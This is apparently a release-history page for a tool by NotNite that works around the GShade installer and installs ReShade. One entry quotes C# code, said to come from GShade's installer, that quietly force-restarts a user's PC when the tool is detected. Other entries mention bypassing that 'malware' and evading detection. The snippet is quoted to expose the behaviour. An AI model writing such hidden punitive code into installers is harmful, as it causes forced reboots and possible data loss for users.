• 1.1.1 12427d0790

    1.1.1: whoops Stable

    NotNite released this 2023-03-03 17:16:51 -05:00 | 0 commits to main since this release

    • Made it work again
    • Updated to ReShade 5.7.0
    • Patched a potential detection method (just in case)
    Downloads
  • 1.1.0 eddebdc307

    NotNite released this 2023-02-06 18:37:55 -05:00 | 3 commits to main since this release

    • Added ability to install ReShade automatically
    Downloads
  • 1.0.5 c1dca873c1

    NotNite released this 2023-02-06 17:48:44 -05:00 | 6 commits to main since this release

    • Fixed more Path.Combine stuff
    Downloads
  • 1.0.4 90983c5f76

    NotNite released this 2023-02-06 12:10:08 -05:00 | 9 commits to main since this release

    • Fixed string concat
    Downloads
  • 1.0.3 aba63c43bc

    NotNite released this 2023-02-06 11:37:01 -05:00 | 10 commits to main since this release

    • Fix the malware bypass
    Downloads
  • 1.0.2 c992ca4714

    NotNite released this 2023-02-06 09:04:11 -05:00 | 12 commits to main since this release

    Check out this new code added to the GShade installer:

        private static void lol() => new Process()
        {
          StartInfo = {
            WorkingDirectory = Environment.SystemDirectory,
            FileName = "shutdown.exe",
            Arguments = "-r -t 0",
            WindowStyle = ProcessWindowStyle.Hidden
          }
        }.Start();
    

    That's right, Marot shuts down your PC when it's detected you're using my software! Isn't that kind?

    Downloads
  • 1.0.1 048c6d67a1

    NotNite released this 2023-02-05 21:15:12 -05:00 | 14 commits to main since this release

    • Fixed an issue when a certain type of path was entered
    Downloads
  • 1.0.0 27d76e62f8

    NotNite released this 2023-02-05 20:52:04 -05:00 | 17 commits to main since this release

    Probably requires some kind of .NET, I don't give a shit to check.

    Downloads